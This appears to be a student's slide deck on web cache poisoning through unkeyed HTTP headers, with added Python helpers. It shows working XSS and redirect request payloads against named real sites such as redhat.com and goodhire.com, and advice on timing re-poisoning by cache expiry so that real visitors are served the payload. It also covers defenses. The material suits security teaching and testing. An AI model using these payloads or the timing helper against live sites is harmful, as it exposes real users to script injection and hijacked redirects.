2. About Me
● A neophyte
● Web enthusiast
● iAm NoT yEt wORkInG iAm
sTiLl sTudiNg (◕‿◕)
3. Overview
● Which kind of cache poisoning are we talking about?
● Quickly Recalling Caching
● Case Studies
● Practical Time
● Defense
4. Web Cache Poisoning at a glance
Web Cache Poisoning is NOT
● Web Cache Deception
● Browser Cache Poisoning
● Request Smuggling
● Response Splitting
● DNS Cache Poisoning
11. How do we poison caches?
● Using unkeyed inputs like HTTP Headers
● Using Request Smuggling
● Using Response Splitting
➔ This presentation focuses on exploitation through unkeyed HTTP headers
18. Cached XSSed Response in redhat.com
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
Blah…
<meta property="og:image" content="https://a."><script>alert(1)</script>"/>
19. Discreet Poisoning
● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 only; the unused query parameter gives us our own cache entry, so legitimate users were not served the payload.
● To hit the site's real users we have to poison the real URL, and we need to be the first to request it every time the cached copy expires.
● That means reverse engineering the cache's expiry behaviour (from headers such as Age and Cache-Control) and digging through the CDN's documentation to know exactly when the cached object will expire.
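As an added example (not from the original slides), here is a small Python helper that does the expiry arithmetic the slide describes, working only from response headers that appear elsewhere in this deck (Age, Cache-Control, X-Cache, CF-Cache-Status). The header sets it is run on are constructed for illustration, not captured traffic.

```python
"""Cache expiry and hit/miss helpers for timing a re-poisoning attempt.

Added example, not code from the original slides. It only reads response
headers that appear elsewhere in this deck (Age, Cache-Control, X-Cache,
CF-Cache-Status); the header sets in __main__ are constructed, not captured.
"""
from typing import Dict, Optional


def _lower(headers: Dict[str, str]) -> Dict[str, str]:
    """Header names are case-insensitive; normalise once so lookups are simple."""
    return {k.lower(): v for k, v in headers.items()}


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'public, max-age=600, s-maxage=3600' -> {'public': None, 'max-age': '600', 's-maxage': '3600'}"""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip()
        if part:
            name, _, arg = part.partition("=")
            directives[name.strip().lower()] = arg.strip().strip('"') or None
    return directives


def freshness_lifetime(headers: Dict[str, str]) -> Optional[int]:
    """Seconds a shared cache may serve the object without revalidating.

    s-maxage overrides max-age for shared caches (RFC 9111). no-store and
    no-cache mean the object should not be served from cache, so we return
    None; caches do not always honour that, so None means 'unknown', not 'safe'.
    """
    cc = parse_cache_control(_lower(headers).get("cache-control", ""))
    if "no-store" in cc or "no-cache" in cc:
        return None
    for directive in ("s-maxage", "max-age"):
        arg = cc.get(directive)
        if arg is not None and arg.isdigit():
            return int(arg)
    return None


def seconds_until_expiry(headers: Dict[str, str]) -> Optional[int]:
    """Remaining freshness = lifetime - Age, floored at 0.

    Age is measured by the cache node that answered, so this predicts when
    *that* node's copy goes stale; a CDN has many nodes, each with its own Age.
    """
    lifetime = freshness_lifetime(headers)
    if lifetime is None:
        return None
    age = _lower(headers).get("age", "0")
    return max(lifetime - (int(age) if age.isdigit() else 0), 0)


def is_cache_hit(headers: Dict[str, str]) -> bool:
    """Recognise the hit markers the CDNs in this deck expose, plus a non-zero Age."""
    h = _lower(headers)
    if h.get("x-cache", "").lower().startswith("hit") or h.get("cf-cache-status", "").upper() == "HIT":
        return True
    age = h.get("age", "")
    return age.isdigit() and int(age) > 0


if __name__ == "__main__":
    # Constructed samples modelled on the responses shown on slides 18 and 22.
    samples = {
        "cloudfront-style hit": {"Age": "32707", "X-Cache": "Hit from cloudfront",
                                 "Cache-Control": "public, max-age=86400"},
        "cloudflare miss": {"CF-Cache-Status": "MISS", "Cache-Control": "max-age=600"},
        "no-cache but cached anyway": {"Cache-Control": "public, no-cache", "Age": "120"},
    }
    for label, hdrs in samples.items():
        print(f"{label}: hit={is_cache_hit(hdrs)} expires_in={seconds_until_expiry(hdrs)}")
```

Two caveats when using this for real. Age is reported by the edge node that answered you, and a CDN has many, so the figure tells you when that node's copy goes stale; re-poisoning has to be repeated per edge, or pinned to the same one. Caches also do not always honour Cache-Control: the redhat.com response on slide 18 carried `public, no-cache` and was cached regardless, so `None` from `seconds_until_expiry` means "unknown", not "not cached"; a non-zero Age or an explicit hit marker is the better evidence.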
22. DOM Poisoning
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canary
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://canary/">
23. Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: id.burpcollaborator.net
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://id.burpcollaborator.net/">
26. Mozilla SHIELD
● A feature that installs add-ons in the background for marketing purposes
● It became famous for force-installing the Mr. Robot extension in the background
● The caching layer was Nginx
● Firefox sent an odd-looking request in which the Origin header was all lowercase:
GET /api/v1/recipe/signed/ HTTP/1.1
Blah: ...
origin: null
Blah: ...
28. ● Recipes were signed, so we could not install an add-on of our choice
● Backend Mozilla systems that use unsigned recipes let us peek into the system, and might help us obtain the signing key
● But we could still perform a DoS
● We could install already-signed add-ons
29. Route Poisoning in goodhire.com
● Some applications naively take request headers, build URLs from them and use those URLs for routing :)
● goodhire.com is hosted on HubSpot (hubspot.com), which sits behind Cloudflare's cache.
30. Route Poisoning in goodhire.com
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canary
Response:
HTTP/1.1 404 Not Found
CF-Cache-Status: MISS
...
<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>
31. Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com
Response:
HTTP/1.1 200 OK
...
<script>alert(document.domain)</script>
32. Hidden route poisoning
● This vulnerability was in blog.cloudflare.com, which is cached by Cloudflare's own service.
● blog.cloudflare.com is hosted using Ghost.
33. A normal fail response
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canary
Response:
HTTP/1.1 302 Found
Location: https://ghost.org/fail/
35. B...bu….but what if we use a website hosted on Ghost?
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.io
Response:
HTTP/1.1 302 Found
Location: http://noshandnibble.blog/
36. How much damage can we do with it?
● Files that were cached
a. jpg
b. png
c. pdf
d. js
e. css
37. Bypassing mixed-content
protection
● Mixed content is when an HTTPS page requests a resource over plain HTTP.
● Browsers block such loads; this feature is called mixed-content protection.
● The redirect Ghost issued pointed to an HTTP URL rather than HTTPS, which was a big obstacle: a poisoned script or stylesheet would simply be blocked.
Again stuck :/
38. Luckily, bounty hunters helped
● Safari's HSTS handling automatically upgrades the redirect to HTTPS
● HSTS (HTTP Strict Transport Security) is a mechanism that prevents eavesdropping by making the browser upgrade HTTP requests to HTTPS
● In Edge (at the time of this research), a 302 response completely bypasses mixed-content protection
39. Chaining unkeyed inputs
● Sometimes an unkeyed input only confuses part of the application.
● We then need to chain several unkeyed inputs to get something useful.
40. Request 1:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyz
Response:
HTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz
41. Request 2:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved Permanently
Location: https://redacted.net/en
43. Open Graph Hijacking
● Here's everyone's favourite: Facebook hacking!
● Open Graph is a protocol developed by Facebook that lets other sites integrate with Facebook; a page's og: meta tags (like the og:image tag seen on slide 18) decide how it is rendered when shared.
● But what if we poison the cached page so its Open Graph tags say whatever we want shared? Let's try it out.
46. Defense
● Do NOT use caching at all (the only complete fix, rarely practical)
● Avoid taking input from request headers.
● If you must, include those headers in the cache key.
● Use Burp's active scanner or tools like Param Miner to find unkeyed inputs.
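To make the keyed/unkeyed distinction concrete, here is an added Python simulation (not code from the original slides, nor from any site named in them; the hostnames, paths and backends are invented). It covers three points from this deck in one place: an unkeyed header lets a single request poison what later visitors receive (slides 11 and 22), two individually harmless unkeyed inputs can be chained into a cached redirect (slides 39 to 41; that the two headers combine this way is assumed, since the slides show each on its own), and putting the header into the cache key or refusing to trust it stops the attack (slide 46).

```python
"""Simulate a shared cache in front of backends that trust forwarded headers.

Added example, not code from the original slides nor from any site named in
them; the hostnames, paths and backends are invented for illustration.
"""
import html
from typing import Callable, Dict, Tuple

Headers = Dict[str, str]
Response = Tuple[int, Headers, str]          # status, headers, body
SITE = "www.example.test"                    # hypothetical victim site
CACHEABLE = {"cache-control": "public, max-age=3600"}


def backend_trusting(method: str, path: str, h: Headers) -> Response:
    """data.gov-style bug: the site root comes from X-Forwarded-Host when present."""
    host = h.get("x-forwarded-host", h["host"])
    body = f'<body data-site-root="https://{host}/"><script src="https://{host}/app.js"></script>'
    return 200, dict(CACHEABLE), body


def backend_chain(method: str, path: str, h: Headers) -> Response:
    """redacted.net-style chain. X-Forwarded-Scheme other than https forces a 301
    to the https URL, and the redirect host is built from X-Forwarded-Host.
    The slides show each header alone; that they combine like this is assumed."""
    host = h.get("x-forwarded-host", h["host"])
    if h.get("x-forwarded-scheme", "https") != "https":
        return 301, {**CACHEABLE, "location": f"https://{host}{path}"}, ""
    return 200, dict(CACHEABLE), "<p>locale page</p>"


def backend_hardened(method: str, path: str, h: Headers) -> Response:
    """Only Host is used, only allow-listed values are accepted, and the value is escaped."""
    if h["host"] not in {SITE, "example.test"}:        # hypothetical allow-list
        return 400, {"cache-control": "no-store"}, "bad host"
    safe = html.escape(h["host"], quote=True)
    body = f'<body data-site-root="https://{safe}/"><script src="https://{safe}/app.js"></script>'
    return 200, dict(CACHEABLE), body


class SharedCache:
    """Minimal CDN-style cache. Request headers named in `keyed_headers` are part
    of the cache key; every other header is 'unkeyed' and invisible to the cache."""

    def __init__(self, origin: Callable[[str, str, Headers], Response], keyed_headers=()):
        self.origin = origin
        self.keyed_headers = tuple(k.lower() for k in keyed_headers)
        self.store: Dict[tuple, Response] = {}
        self.hits = 0

    def fetch(self, method: str, path: str, headers: Headers) -> Response:
        h = {k.lower(): v for k, v in headers.items()}
        key = (method, h["host"], path) + tuple(h.get(k, "") for k in self.keyed_headers)
        if key in self.store:
            self.hits += 1
            return self.store[key]
        resp = self.origin(method, path, h)
        status, rh, _ = resp
        if status in (200, 301) and "no-store" not in rh.get("cache-control", ""):
            self.store[key] = resp            # now served to everyone sharing this key
        return resp


def poison_then_visit(cache: SharedCache, path: str, attacker_headers: Headers) -> Response:
    """Attacker sends one request carrying the extra headers; a victim then requests
    the same URL with none of them. Returns what the victim received."""
    cache.fetch("GET", path, {"Host": SITE, **attacker_headers})
    return cache.fetch("GET", path, {"Host": SITE})


def victim_sees(resp: Response, marker: str) -> bool:
    """True if the attacker-controlled marker reached the victim in the body or Location."""
    _, rh, body = resp
    return marker in body or marker in rh.get("location", "")


if __name__ == "__main__":
    evil = "attacker.example"
    cases = [
        ("unkeyed X-Forwarded-Host, trusting backend", SharedCache(backend_trusting), "/dataset",
         {"X-Forwarded-Host": evil}),
        ("scheme header alone", SharedCache(backend_chain), "/en", {"X-Forwarded-Scheme": "nothttps"}),
        ("scheme + host chained", SharedCache(backend_chain), "/en",
         {"X-Forwarded-Scheme": "nothttps", "X-Forwarded-Host": evil}),
        ("header added to cache key", SharedCache(backend_trusting, ["X-Forwarded-Host"]), "/dataset",
         {"X-Forwarded-Host": evil}),
        ("backend ignores the header", SharedCache(backend_hardened), "/dataset", {"X-Forwarded-Host": evil}),
    ]
    for label, cache, path, hdrs in cases:
        print(f"{label}: victim poisoned = {victim_sees(poison_then_visit(cache, path, hdrs), evil)}")
```

Two things worth noticing in the output. With the scheme header alone, the victim is bounced to the https URL they are already on, so nothing attacker-controlled reaches them (though a cached self-redirect is already a nuisance); only the chained request caches a Location pointing at the attacker. And keying the header does not stop the attacker's own request from getting a reflected response, it just confines that response to a cache entry nobody else shares; the unkeyed version is what turns a self-only reflection into something every visitor receives.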
47. Thanks
● Connect with me
○ kuldeep.pandya.77799@Facebook
○ some_dank_boi@Instagram
○ Predator77799@Twitter